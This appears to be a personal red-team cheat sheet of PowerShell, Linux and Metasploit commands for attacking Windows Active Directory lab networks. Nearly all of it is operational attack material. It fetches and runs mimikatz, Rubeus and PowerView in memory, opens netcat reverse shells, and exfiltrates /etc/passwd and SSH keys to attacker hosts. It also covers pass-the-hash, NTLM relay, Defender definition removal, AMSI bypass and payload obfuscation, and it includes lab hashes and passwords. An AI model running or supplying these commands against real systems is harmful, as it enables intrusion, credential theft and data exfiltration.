ImaginaryBIT
7/20/2019 - 12:01 PM

#05. RedTeam CheatSheet

#05. RedTeam CheatSheet

# General Payload  
```powershell
$ExecutionContext.SessionState.LanguageMode
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe
dir C:\Windows\Microsoft.Net\Framework64
Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"
  
IEX(New-Object Net.WebClient).DownloadString("http://192.168.49.54:8080/apple.txt");
IEX(New-Object Net.WebClient).DownloadString("http://192.168.49.54:8080/loadDLL64.txt");
IEX(New-Object Net.WebClient).DownloadString("http://192.168.49.54:8080/PowerView.ps1");
IEX(New-Object Net.WebClient).DownloadString("http://192.168.49.54:8080/Powermad.ps1");
  
IEX(New-Object Net.WebClient).DownloadString('http://192.168.49.54:8080/LAPSToolkit.ps1'); Find-AdmPwdExtendedRights  
IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.49.54:8080/mimikatz.txt'); invoke-mimikatz
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"'
  
IEX(New-Object Net.WebClient).DownloadString("http://192.168.49.54:8080/PowerUp.ps1");  
Invoke-AllChecks;  
Get-Service Vuln_Service_Name | Invoke-ServiceAbuse;  
  
Invoke-WebRequest -Uri http://192.168.49.54:8080/x64/mimidrv.sys -OutFile mimidrv.sys  
Invoke-WebRequest -Uri http://192.168.49.54:8080/x64/mimikatz.exe -OutFile mimikatz.exe  
Invoke-WebRequest -Uri http://192.168.49.54:8080/x64/MiniDump.exe -OutFile MiniDump.exe  

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221")); $o.Open("GET", "http://127.0.0.1/payload", $False); $o.Send(); IEX $o.responseText;  

Invoke-WebRequest -Uri http://192.168.49.54:8080/MetLink.exe -OutFile MetLink.exe  
Invoke-WebRequest -Uri http://192.168.49.54:8080/PsExec64.exe -OutFile PsExec64.exe  
  
IEX(New-Object Net.WebClient).DownloadString("http://192.168.49.54:8080/SharpHound.ps1"); Invoke-BloodHound -CollectionMethod All  
Invoke-WebRequest -Uri http://192.168.49.54:8080/SharpHound.exe -OutFile SharpHound.exe  
.\SharpHound.exe --CollectionMethod All  
Invoke-Restmethod -uri http://192.168.49.54:8080/20210410063748_BloodHound.zip -Method Put -Infile C:\\users\\administrator\\desktop\\20210410063748_BloodHound.zip;  
  
Invoke-WebRequest -Uri http://192.168.49.54:8080/chisel.exe -OutFile chisel.exe  
.\chisel.exe client 192.168.49.54:10102 R:1080:socks  
chisel server -p 10102 --reverse -v  
  
Invoke-Expression(New-Object Net.WebClient).DownloadString('http://192.168.49.54:8080/PowerUpSQL.ps1');  
Invoke-WebRequest -Uri http://192.168.49.54:8080/SQL.exe -OutFile SQL.exe  
Invoke-WebRequest -Uri http://192.168.49.54:8080/SQL_dirtree.exe -OutFile SQL_dirtree.exe  
Invoke-WebRequest -Uri http://192.168.49.54:8080/SQLlink.exe -OutFile SQLlink.exe  
Invoke-WebRequest -Uri http://192.168.49.54:8080/SQLenum.exe -OutFile SQLenum.exe  
Invoke-WebRequest -Uri http://192.168.49.54:8080/SQLdoubleLink.exe -OutFile SQLdoubleLink.exe  
  
Invoke-WebRequest -Uri http://192.168.49.54:8080/PrintSpooferNet.exe -OutFile PrintSpooferNet.exe  
Invoke-WebRequest -Uri http://192.168.49.54:8080/MetLink.exe -OutFile MetLink.exe  
Invoke-WebRequest -Uri http://192.168.49.54:8080/SpoolSample.exe -OutFile SpoolSample.exe  

Invoke-WebRequest -Uri http://192.168.49.54:8080/winPEASx64.exe -OutFile winPEAS.exe
.\winPEAS.exe log
(New-Object System.Net.WebClient).DownloadString('http://192.168.49.54:8080/apple.txt') | IEX;  
$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.49.54:8080/winPEASx64.exe');$RAS = [System.Reflection.Assembly]::Load($data);[winPEAS.Program]::Main(0);  

.\PsExec64.exe -accepteula -i -s powershell.exe  
.\PsExec64.exe -accepteula \\dc03.ADMIN.OFFSHORE.COM cmd /c "c:\Users\Administrator\Downloads\MetLink.exe"  
.\PsExec64.exe -accepteula -u tricky\will -p "Password123!#$" -i cmd  

(New-Object System.Net.WebClient).DownloadString('http://192.168.49.54:8080/amsi.txt') | IEX;
$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.49.54:8080/Rubeus.exe') ;
$assem = [System.Reflection.Assembly]::Load($data);
[Rubeus.Program]::Main("purge".Split());
[Rubeus.Program]::Main("s4u /user:web01$ /rc4:12343649cc8ce713962859a2934b8cbb /impersonateuser:administrator /msdsspn:cifs/file01 /ptt".Split()) ;

& "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All  

Invoke-Restmethod -uri http://192.168.49.54:8080/id_rsa -Method Put -Infile C:\\users\\nina\\.ssh\\id_rsa;  
Invoke-Restmethod -uri http://192.168.49.54:8080/known_hosts -Method Put -Infile C:\\users\\nina\\.ssh\\known_hosts;  
python /usr/share/john/ssh2john.py id_rsa > ssh.hash  
sudo john --wordlist=/usr/share/wordlists/rockyou.txt ./ssh.hash  
proxychains4 ssh -i ./id_rsa nina@ops.totalenergy.com@172.16.66.137  
  
proxychains4 psexec.py OPS.TOTALENERGY.COM/ben@172.16.66.132 -hashes aad3b435b51404eeaad3b435b51404ee:dba005e1a048017596826afe0fd8b830  
proxychains4 psexec.py ops.comply.com/pete:Password1@PROXY01.ops.comply.com  
  
kdestroy  
export KRB5CCNAME=/home/kali/Documents/OSEP/www/krb5cc  
Add hostname in /etc/hosts  
klist  
proxychains4 psexec.py OPS.TOTALENERGY.COM/ivar@APPSRV02.OPS.TOTALENERGY.COM -k -no-pass  
  
proxychains4 crackmapexec smb 192.168.215.138 -u 'Administrator' -p 'PASSWORD' --local-auth  
proxychains4 crackmapexec smb ./hosts.list -d "DMZTE" -u iissvc -H "aad3b435b51404eeaad3b435b51404ee:f7fda76d93587b87e8ecc4f7b3ac2e36" --shares  
proxychains4 crackmapexec smb ./hosts.list -d "DMZTE" -u iissvc -p "password" -x whoami  
proxychains4 crackmapexec smb ./ops_hosts.list -d "OPS.TOTALENERGY.COM" -u ivar -k --kdchost OPS.TOTALENERGY.COM --shares  
  
proxychains4 crackmapexec winrm ./hosts.list -d "DMZTE" -u iissvc -H "aad3b435b51404eeaad3b435b51404ee:f7fda76d93587b87e8ecc4f7b3ac2e36"  
proxychains4 crackmapexec winrm ./hosts.list -d "DMZTE" -u iissvc -p "password"  
  
proxychains4 evil-winrm -u username -p password -i 172.16.66.214  
proxychains4 evil-winrm -u username -H hashes -i 172.16.66.214  
  
proxychains4 rdp_check.py <domain>/<name>:<password>@<IP>  
proxychains4 rdp_check.py <domain>/<name>@<IP> -hashes LMHASH:NTHASH  
  
proxychains xfreerdp +nego +sec-rdp +sec-tls +sec-nla /d:dmzte.com /u:iissvc /p:gko5456SDFksls3 /v:172.16.66.214  
#restricted admin  
proxychains xfreerdp +nego +sec-rdp +sec-tls +sec-nla /d:dmzte.com /u:iissvc /pth:7337532fd3bf3abfaef5a9b5bb05a9d8 /v:172.16.66.214  
  
sudo proxychains python3 /home/kali/.local/bin/ntlmrelayx.py --no-http-server -smb2support -t 172.16.66.215 -c 'PowerShell -nop -noe $result = $ExecutionContext.SessionState.LanguageMode; $postParams = @{result=$result;}; Invoke-WebRequest -Uri http://192.168.49.54:8080 -Method POST -Body $postParams;'  
sudo proxychains python3 /home/kali/.local/bin/ntlmrelayx.py --no-http-server -smb2support -t 172.16.66.215 -e ./payload.exe  
```  

# Basis Commands

`msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.49.126 LPORT=443 EXITFUNC=thread PayloadUUIDTracking=true HandlerSSLCert=/home/kali/self_cert/nasa.pem StagerVerifySSLCert=true PayloadUUIDName=ShellIsDelicious -f csharp -o met32.cs`  

`sudo msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set LHOST 192.168.49.126; set LPORT 443;set EXITFUNC thread; set StagerVerifySSLCert true; set HANDLERSSLCERT /home/kali/self_cert/nasa.pem; exploit -j"`  

## Generic Commands
```powershell
[Environment]::Is64BitProcess                                   # Check PS process is x64 or x86
%SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe    # x64 powershell on Windows Server
%SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe    # x64 powershell on Windows Server
c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe       # x32 powershell on Windows workstation
c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe       # x32/x64 powershell on Windows workstation
$command | out-string                                           # print output in string format
icacls "file_or_folder"                                         # check acl
ICACLS C:\windows\temp\mimikatz.exe /grant everyone:F           # grant acl permission
whoami /groups  
whoami /priv
$HOME
$env:USERNAME
$env:USERDOMAIN
$env:COMPUTERNAME

# run exe in backgroud
START /B PsExec64.exe -accepteula \\dc03.ADMIN.OFFSHORE.COM cmd /c "c:\Users\Administrator\Downloads\nc.exe 10.10.14.5 5555 -e cmd.exe"
```
## Unix Command Mapping
```
(Get-Item .).FullName     # pwd
tasklist /v | findstr mimik      # ps aux| grep
dir -Recurse | Select-String -pattern "joe@offshor"    # grep -ir
Invoke-WebRequest -Uri http://10.10.14.2/winPEAS.exe     # curl
(New-Object Net.WebClient).DownloadFile('http://10.10.14.5:8888/nc.exe','c:\Users\Administrator\Downloads\nc.exe')    # wget  
Invoke-WebRequest -Uri http://10.10.14.2/winPEAS.exe -OutFile winPEAS.exe  # wget2  
Invoke-Expression(New-Object Net.WebClient).DownloadString('http://10.10.14.2/Invoke-PowerShellTcp.ps1');     # execute PS script  
taskkill /f /im:mimikatz.exe    # kill -9 pid  
taskkill /f /pid 1234    # kill -9 pid  
runas /user:Bob “C:\Windows\notepad.exe”  # su, required to enter password in a prompt  
.\PsExec64.exe -accepteula -u tricky\will -p "Password123!#$" cmd  # su with password  
.\PsExec64.exe -accepteula -u tricky\will -p "Password123!#$" -i cmd  # su with password  
Get-ChildItem Env:    # env  
netsh trace start capture=yes CaptureInterface="Ethernet" tracefile="C:\Users\user\Desktop\www\trace.etl" maxsize=10 # tcpdump
```
## Debug Powershell Errors
`$result = [string]$error; $postParams = @{Errors=$result;};Invoke-WebRequest -Uri http://192.168.49.54:8080 -Method POST -Body $postParams;`

## Find DC via DNS
```
nslookup -type=srv _kerberos._tcp.EXMAPLE.COM
nslookup -type=srv _kerberos._udp.EXMAPLE.COM
nslookup -type=srv _kpasswd._tcp.EXAMPLE.COM
nslookup -type=srv _kpasswd._udp.EXAMPLE.COM
nslookup -type=srv _ldap._tcp.EXAMPLE.COM
nslookup -type=srv _ldap._tcp.dc._msdcs.EXAMPLE.COM
nslookup -type=srv _ldap._tcp.pdc._msdcs.EXAMPLE.COM
nslookup -type=srv _ldap._tcp.gc._msdcs.ROOT.COM
```

## Capture flags  
```powershell
get-childitem -path "c:\users" -recurse -include "flag.txt" -ErrorAction SilentlyContinue | where {$_.name -eq "flag.txt"} | % {$_.FullName};      
get-childitem -path "c:\users" -recurse -include "local.txt" -ErrorAction SilentlyContinue | where {$_.name -eq "local.txt"} | % {$_.FullName};  
get-childitem -path "c:\users" -recurse -include "proof.txt" -ErrorAction SilentlyContinue | where {$_.name -eq "proof.txt"} | % {$_.FullName};  
get-childitem -path "c:\users" -recurse -include "secret.txt" -ErrorAction SilentlyContinue | where {$_.name -eq "secret.txt"} | % {$_.FullName};  
```

## Bash obfuscation  
https://github.com/Bashfuscator/Bashfuscator  

## Powershell Obfuscation
https://github.com/danielbohannon/Invoke-Obfuscation
```
set scriptblock $data = (New-Object System.Net.WebClient).DownloadData('http://192.168.10.128:8000/ClassLibrary1.dll');$assem = [System.Reflection.Assembly]::Load($data);$class = $assem.GetType("ClassLibrary1.Class1");$method = $class.GetMethod("runner");$method.Invoke(0, $null)
Choose one of the below options:
 
[*] TOKEN       Obfuscate PowerShell command Tokens
[*] AST         Obfuscate PowerShell Ast nodes (PS3.0+)
[*] STRING      Obfuscate entire command as a String
[*] ENCODING    Obfuscate entire command via Encoding
[*] COMPRESS    Convert entire command to one-liner and Compress
[*] LAUNCHER    Obfuscate command args w/Launcher techniques (run once at end)
 
Choose one of the below Encoding options to APPLY to current payload:
 
[*] ENCODING\1          Encode entire command as ASCII
[*] ENCODING\2          Encode entire command as Hex
[*] ENCODING\3          Encode entire command as Octal
[*] ENCODING\4          Encode entire command as Binary
[*] ENCODING\5          Encrypt entire command as SecureString (AES)
[*] ENCODING\6          Encode entire command as BXOR
[*] ENCODING\7          Encode entire command as Special Characters
[*] ENCODING\8          Encode entire command as Whitespace
 
Use TEST to check the script running result
```
## Powershell command encoding
```
$command = '$ErrorActionPreference= "silentlycontinue";Get-ChildItem -Path c:\*\*\ -Force | where { $_.PSIsContainer -eq "TRUE"} | Where-Object { $acl = Get-Acl $_.FullName; $acl.Access | Where-Object { $_.identityreference -match "authenticated users|everyone|$env:username" -and $_.filesystemrights -match "full|modify|write"}}'  
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command)) | clip  
powershell -exec bypass -nop -EncodedCommand {paste_your_base64_encoded_command}  
# file encoding
[System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("c:\users\user\desktop\test.txt"))
```
## Powershell command decoding
```
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('JwBtAGkAawBlAGYAcgBvAGIAYgBpAG4AcwAuAGMAbwBtACcA'))  
```
## Powershell ping  
```
1..254 | ForEach-Object {Test-Connection -ComputerName "172.16.4.$_" -Count 1 -ErrorAction SilentlyContinue}  
1..254 | ForEach-Object {Get-WmiObject Win32_PingStatus -Filter "Address='172.16.4.$_' and Timeout=200 and ResolveAddressNames='true' and StatusCode=0" | select ProtocolAddress*}  
```
## Extract password from a secure string  
```
$pw = Get-Content admin_pass.xml | ConvertTo-SecureString  
$cred = New-Object System.Management.Automation.PsCredential("administrator", $pw)  
$cred.getnetworkcredential() | fl *  
```
## Create windows credentials  
```
$username='imaginarybit'  
$password='P@ssw0rd12345!'  
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force  
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword  
```
## Create Schedule Task  
```
SCHTASKS /CREATE /SC DAILY /TN "FOLDERPATH\TASKNAME" /TR "C:\SOURCE\FOLDER\APP-OR-SCRIPT" /ST HH:MM /RU USER-ACCOUNT  
SCHTASKS /CREATE /SC HOURLY /TN "Drive Mornitoring" /TR "powershell.exe C:\test.ps1" /ST 8:00 /RU admin  
SCHTASKS /QUERY    # Check all  
```
## Start a process using another user
```
$username='someUser'  
$password='somePassword'  
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force  
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword  
Start-Process .\nc.exe -ArgumentList '10.10.xx.xx 4445 -e cmd.exe' -Credential $credential -NoNewWindow  
or  
Start-Process 'cmd.exe' -Credential $cred -ArgumentList "/c 'C:\xampp\htdocs\plugins\nc.exe 172.16.1.5 8888 -e cmd.exe'" -NoNewWindow  
or  
Invoke-Command -ScriptBlock {nc.exe 172.16.1.5 8888} -Credential $cred -computername localhost  
```
## Command execution remotely  
```
PsExec64.exe -accepteula \\dc03.ADMIN.OFFSHORE.COM powershell.exe -exec Bypass -noexit -C "(New-Object Net.WebClient).DownloadFile('http://10.10.14.5:8888/nc.exe','c:\Users\Administrator\Downloads\nc.exe')"  
PsExec64.exe -accepteula \\dc03.ADMIN.OFFSHORE.COM cmd /c "c:\Users\Administrator\Downloads\nc.exe 10.10.14.5 5555 -e cmd.exe"  
winrs.exe -r:192.168.1.105 -u:ignite.local\administrator -p:Ignite@987 CMD  
Invoke-Command -ComputerName "192.168.1.105" -Credential workgroup\administrator -Authentication Negotiate -Port 5985 -ScriptBlock {net user administrator}
Invoke-WmiMethod –ComputerName MEMBERSRV1 -Class win32_process -Name create -ArgumentList "notepad"
wmic /authority:"kerberos:CORP\WIN8WORKSTATION" /node:172.16.48.83 process call create “stuff”  
wmic /authority:"kerberos:client.offshore.com\DC04" /node:172.16.4.5 process call create "powershell -f c:\windows\temp\rev.ps1"  
Wmic /node:"ComputerName" process call create "cmd.exe /c (net use o: /delete /y & net use o: \\Server\share /user:Domain\Administrator Password & o:\Dir\Subdir\test.cmd) >> c:\users\MyUser\testout2.txt"  
```
## OpenSCManager  
requires RPC Server  
```
sc.exe \\myserver query state= all  
sc.exe \\myserver config NewService binpath= ntsd -d c:\windows\system32\NewServ.exe  
sc.exe \\myserver create NewService binpath= c:\windows\system32\NewServ.exe  
sc.exe \\myserver stop <service>  
sc.exe \\myserver start <service>  
```
## Access an interactive session on a remote computer
Does not work on local users, it will do kerberos auth.
```
Enter-PSSession -ComputerName DC02 -Credential dev\joe  
Enter-PSSession -ComputerName Server01 -Port 90 -Credential Domain01\User01  
Enter-PSSession -ComputerName DC02.dev.ADMIN.OFFSHORE.COM -Credential $credential  
```
## HTTP Full functional Server
used in Data Exfiltration, Download file, and Upload file
`python3 HTTP_Server.py 8080`

https://github.com/ImaginaryBIT/Python_HTTP_Server/blob/main/HTTP_Server.py

## Data Exfiltration  
```
cmd.exe /c FOR /F %a in ('wmic useraccount get name') do certutil -f -urlcache http://10.139.138.137/%a  
cmd.exe /c FOR /F %a in ('dir c:\users\ /b') do certutil -f -urlcache http://10.139.138.137/%a  
  
powershell.exe -exec bypass -C '(New-Object Net.Sockets.TcpClient).connect('10.10.14.2','4444')''  
powershell.exe -exec bypass -C '$command = dir \"c:/users/\";$result = [string]$command;$postParams = @{result=$result;};Invoke-WebRequest -Uri http://127.0.0.2 -Method POST -Body $postParams;'  
powershell.exe -exec Bypass -C "$command = whoami /priv;$result=[string]$command;Invoke-WebRequest -Uri http://10.10.14.4/$result"  
powershell.exe -exec Bypass -C "(New-Object System.Net.WebClient).DownloadFile(\"http://10.10.14.4/simple.exe\", \"C:\\users\\username\\downloads\\simple.exe\")"  
powershell.exe -exec Bypass -C "$Folder=\"C:\\Windows\\Temp\";$permission = (Get-Acl $Folder).Access;$result=[string]$permission;Invoke-WebRequest -Uri http://10.10.14.2/folder/$permission"  
  
cancel -u "$(cat /etc/passwd)" -h 192.168.0.147:1234  
wget --post-file=/etc/passwd 192.168.0.147:1234  
whois -h 192.168.0.147 -p 1234 `cat  /etc/passwd  
curl -X POST -d @data.txt 192.168.0.147:1234  
finger "$(cat /etc/passwd)@192.168.0.147:1234"  
bash -c 'cat /etc/passwd > /dev/tcp/192.168.0.147/1234'  
ksh -c 'cat /etc/passwd > /dev/tcp/192.168.0.147/1234'  
nc -lnvp 1234                                              # Attacker Machine  
  
openssl s_client -quiet -connect 192.168.0.147:1234 < "/etc/passwd"  
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes    # Attacker Machine  
openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 > passwd              # Attacker Machine  
  
busybox httpd -f -p 8080 -h .  
php -S 0.0.0.0:8080  
ruby -run -e httpd . -p 1234  
irb  
require 'webrick'; WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start;  
wget http://192.168.0.196:8080/data.txt    # Attacker Machine  
  
nc 192.168.0.147 5555 < jeeni.txt  
nc -lnvp 5555 > jeeni.txt                  # Attacker Machine  
or  
nc -lnvp 5555 < jeeni.txt  
nc 192.168.0.147 5555 > jeeni.txt          # Attacker Machine  
```
## Download file  
https://lolbas-project.github.io/#/download
```
certutil.exe -urlcache -split -f [URL] [output-file]  
bitsadmin.exe /transfer [job-name] /download /priority normal [URL-to-payload] [output-path]  
```
## Download file using Powershell  
```powershell
powershell.exe -exec Bypass -C "commands"  
(New-Object Net.WebClient).DownloadFile('http://10.10.14.5:8888/SharpHound.exe','c:\Users\Administrator\Downloads\SharpHound.exe')  
Invoke-WebRequest -Uri http://192.168.49.54:8080/winPEASx64.exe -OutFile winPEAS.exe  
Invoke-Expression(New-Object Net.WebClient).DownloadString('http://10.10.14.5:8888/PowerView.ps1');  
Invoke-RestMethod -Uri http://192.168.49.54:8080/PsExec64.exe -OutFile PsExec64.exe  
```
## Upload file  
https://github.com/ImaginaryBIT/Python_HTTP_Server/blob/main/HTTP_Server.py  
`python3 HTTP_Server.py or python3 HTTP_Server.py 8080`  

`Invoke-Restmethod -uri http://192.168.49.54:8080/BloodHound.zip -Method Put -Infile C:\\users\\administrator\\desktop\\20210330081025_BloodHound.zip;`

or with UI http://ip:port/  
  
## Outbound port detect  
```
//powershell TcpClient  
22,53,80,443,8080,3389 | % {$test= new-object system.Net.Sockets.TcpClient; $wait =$test.beginConnect("192.168.49.54",$_,$null,$null); ($wait.asyncwaithandle.waitone(250,$false)); if($test.Connected){echo "$_ open";$test.Close();}else{echo "$_ closed"}} | select-string " "  
```
Combine with `egress_listener.py` to check allowed outbound port.  
https://github.com/trustedsec/egressbuster/blob/master/egress_listener.py  

## Monitor Shared Drive Activities  
```
    $folder = '\\pdc\Shared\Accounting'   
    $filter = '*.*'                  
    $fsw = New-Object IO.FileSystemWatcher $folder, $filter -Property @{IncludeSubdirectories = $true;NotifyFilter = [IO.NotifyFilters]'FileName, LastWrite'}   
      
    Register-ObjectEvent $fsw Created -SourceIdentifier FileCreated -Action {  
    $name = $Event.SourceEventArgs.Name  
    $changeType = $Event.SourceEventArgs.ChangeType  
    $timeStamp = $Event.TimeGenerated   
    Write-Host "The file '$name' was $changeType at $timeStamp" -fore green   
    Out-File -FilePath C:\temp\outlog.txt -Append -InputObject "The file '$name' was $changeType at $timeStamp"}   
       
    Register-ObjectEvent $fsw Deleted -SourceIdentifier FileDeleted -Action {   
    $name = $Event.SourceEventArgs.Name   
    $changeType = $Event.SourceEventArgs.ChangeType   
    $timeStamp = $Event.TimeGenerated   
    Write-Host "The file '$name' was $changeType at $timeStamp" -fore red   
    Out-File -FilePath C:\temp\outlog.txt -Append -InputObject "The file '$name' was $changeType at $timeStamp"}   
       
    Register-ObjectEvent $fsw Changed -SourceIdentifier FileChanged -Action {   
    $name = $Event.SourceEventArgs.Name   
    $changeType = $Event.SourceEventArgs.ChangeType   
    $timeStamp = $Event.TimeGenerated   
    Write-Host "The file '$name' was $changeType at $timeStamp" -fore white   
    Out-File -FilePath C:\temp\outlog.txt -Append -InputObject "The file '$name' was $changeType at $timeStamp"}  
  
    Get-EventSubscriber | Unregister-Event  # stop the event  
```
## Change payload from x86 to x64  
```
meterpreter > background  
msf5 > use windows/local/payload_inject  
msf5 > set payload windows/x64/meterpreter/reverse_tcp  
msf5 > set LHOST 10.10.14.2  
msf5 > set SESSION 11  
msf5 > exploit  
```
## Upgrade shell to meterpreter  
```
msf exploit(multi/handler) > use post/multi/manage/shell_to_meterpreter  
msf exploit(multi/handler) > set LPORT 4433  
msf exploit(multi/handler) > set SESSION 1  
msf exploit(multi/handler) > exploit  
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]  
  
[*] Upgrading session ID: 1  
[*] Starting exploit/multi/handler  
[*] Started reverse TCP handler on 10.10.14.14:4433   
[*] Sending stage (861480 bytes) to 10.10.10.94  
[*] Meterpreter session 2 opened (10.10.14.14:4433 -> 10.10.10.94:58956) at 2018-07-27 06:37:15 -0400  
[*] Command stager progress: 100.00% (773/773 bytes)  
msf exploit(multi/handler) > sessions -i 2  
[*] Starting interaction with 2...  
```
## Enable Remote Desktop using PowerShell  
```
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\\' -Name "fDenyTSConnections" -Value 0  
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\\' -Name "UserAuthentication" -Value 1  
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"  
```
## Enable WinRM using PowerShell  
```
Enable-PSRemoting –force  
winrm quickconfig -transport:https  
Set-Item wsman:\localhost\client\trustedhosts *   
Restart-Service WinRM  
test-wsman -computername "WIN-S0V7KMTVLD2"  
```
## Configuring local group membership
```
Add-LocalGroupMember -Group "Administrators" -Member "ugc_user" -ErrorAction SilentlyContinue
Add-LocalGroupMember -Group "Remote Desktop Users" -Member "ugc_user"
```
## Configuring local admin
```
net user administrator /active:yes
net user administrator StrongestPasswordEverPewPew
```
## Edit user account privileges
https://ss64.com/nt/ntrights.html  
https://www.tenforums.com/attachments/tutorial-test/142289d1499096195-change-user-rights-assignment-security-policy-settings-windows-10-a-ntrights.zip  
```
ntrights.exe -u localadmin +r SeInteractiveLogonRight          # Allow Log on locally  
ntrights.exe -u localadmin +r SeRemoteInteractiveLogonRight    # Allow logon through RDP/Terminal Services  
```
## Configuring firewall rules
```
netsh advfirewall Remove-NetFirewallRule
netsh advfirewall set allprofiles firewallpolicy blockinbound,blockoutbound
netsh advfirewall firewall add rule action=allow name=Inbound dir=in protocol=tcp localport=80,443,445,3389
netsh advfirewall firewall add rule action=allow name=Outbound dir=out protocol=tcp remoteport=80,443,445,3389
netsh advfirewall firewall add rule name="ICMP V4" protocol=icmpv4:8,any dir=in action=allow
```
## Disable IPv6
`Disable-NetAdapterBinding -Name "*" -ComponentID ms_tcpip6`

## Troubleshoot powershell
double quote love scripts  
single quote love strings  

**When execute powershell.exe command in cmd.exe cannot put the URL in double quote, because it will be escaped. Put the URL in single quote.**
`powershell.exe -exec bypass -nop -C "IEX (new-Object System.Net.WebClient).DownloadString('http://192.168.49.54:8080/fodUAC.txt')"`
or
`powershell.exe -exec bypass -nop IEX (new-Object System.Net.WebClient).DownloadString('http://192.168.49.54:8080/fodUAC.txt')`

**When execute powershell.exe command in cmd.exe, cmd cannot parse the pipe. Put the pipe in double quote.**
`powershell.exe -exec bypass -nop "(new-Object System.Net.WebClient).DownloadString('http://192.168.49.54:8080/fodUAC.txt') | IEX"`

Those commands cannot be executed in cmd.exe  
`powershell.exe -exec bypass -nop -C 'IEX (new-Object System.Net.WebClient).DownloadString("http://192.168.49.54:8080/fodUAC.txt")'`
and
`powershell.exe -exec bypass -nop IEX (new-Object System.Net.WebClient).DownloadString("http://192.168.49.54:8080/fodUAC.txt")`
and
`powershell.exe -exec bypass -nop (new-Object System.Net.WebClient).DownloadString('http://192.168.49.54:8080/fodUAC.txt') | IEX`

**If encountered the issue below, this is due to you execute powershell in a powershell**  
```
IEX : At line:1 char:15
+ + $Kernel32 = @
Unrecognized token in source text.
```
like  
`PS C:\ > powershell (New-Object System.Net.WebClient).DownloadString('http://192.168.49.54:8080/certificate.txt') | IEX`  
This will make powershell console read the downloaded script line by line. need to include the pipe in double quote.  
`PS C:\ > powershell "(New-Object System.Net.WebClient).DownloadString('http://192.168.49.54:8080/certificate.txt') | IEX"`

# Host Enumeration
- Enumerating services on endpoints and extracting the startname account  
- Searching for connection strings within web.config, scripts, and other locations where service accounts may be hard-coded  
- Exploring the local policy for users granted Log on as a Service  
- Extracting event logs for non-interactive logon types  
- Finding application pool and other web application service accounts  

## Enumeration  tools

Softerra LDAP Browser
https://www.ldapadministrator.com/info_softerra-ldap-browser.htm

```powershell
//query LDAp service
ldapsearch -h 10.11.12.13 -x -z 0 -zz -b "cn=abc, ou=test, ou=base"
//query LDAp service with NULL base DN
ldapsearch -h 10.11.12.13 -x -z 0 -zz -b "" > dump.txt

$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.49.126:8000/winPEASx64.exe');$RAS = [System.Reflection.Assembly]::Load($data);[winPEAS.Program]::Main(0);  
  
seatbelt.exe -group=all  
  
(new-object system.net.webclient).downloadstring('https://192.168.49.126:8000/HostRecon.ps1') | IEX  
Invoke-HostRecon  
  
IEX(New-Object Net.WebClient).DownloadString("http://192.168.49.54:8080/PowerUp.ps1");  
Invoke-AllChecks;  
Get-Service Vuln_Service_Name | Invoke-ServiceAbuse;  

Token/Privilege Enumeration/Abuse:
Get-ProcessTokenGroup               -   returns all SIDs that the current token context is a part of, whether they are disabled or not
Get-ProcessTokenPrivilege           -   returns all privileges for the current (or specified) process ID
Enable-Privilege                    -   enables a specific privilege for the current process
Service Enumeration/Abuse:
Test-ServiceDaclPermission          -   tests one or more passed services or service names against a given permission set
Get-UnquotedService                 -   returns services with unquoted paths that also have a space in the name
Get-ModifiableServiceFile           -   returns services where the current user can write to the service binary path or its config
Get-ModifiableService               -   returns services the current user can modify
Get-ServiceDetail                   -   returns detailed information about a specified service
Set-ServiceBinaryPath               -   sets the binary path for a service to a specified value
Invoke-ServiceAbuse                 -   modifies a vulnerable service to create a local admin or execute a custom command
Write-ServiceBinary                 -   writes out a patched C# service binary that adds a local admin or executes a custom command
Install-ServiceBinary               -   replaces a service binary with one that adds a local admin or executes a custom command
Restore-ServiceBinary               -   restores a replaced service binary with the original executable
DLL Hijacking:
Find-ProcessDLLHijack               -   finds potential DLL hijacking opportunities for currently running processes
Find-PathDLLHijack                  -   finds service %PATH% DLL hijacking opportunities
Write-HijackDll                     -   writes out a hijackable DLL
Registry Checks:
Get-RegistryAlwaysInstallElevated   -   checks if the AlwaysInstallElevated registry key is set
Get-RegistryAutoLogon               -   checks for Autologon credentials in the registry
Get-ModifiableRegistryAutoRun       -   checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns
Miscellaneous Checks:
Get-ModifiableScheduledTaskFile     -   find schtasks with modifiable target files
Get-UnattendedInstallFile           -   finds remaining unattended installation files
Get-Webconfig                       -   checks for any encrypted web.config strings
Get-ApplicationHost                 -   checks for encrypted application pool and virtual directory passwords
Get-SiteListPassword                -   retrieves the plaintext passwords for any found McAfees SiteList.xml files
Get-CachedGPPPassword               -   checks for passwords in cached Group Policy Preferences files
Other Helpers/Meta-Functions:
Get-ModifiablePath                  -   tokenizes an input string and returns the files in it the current user can modify
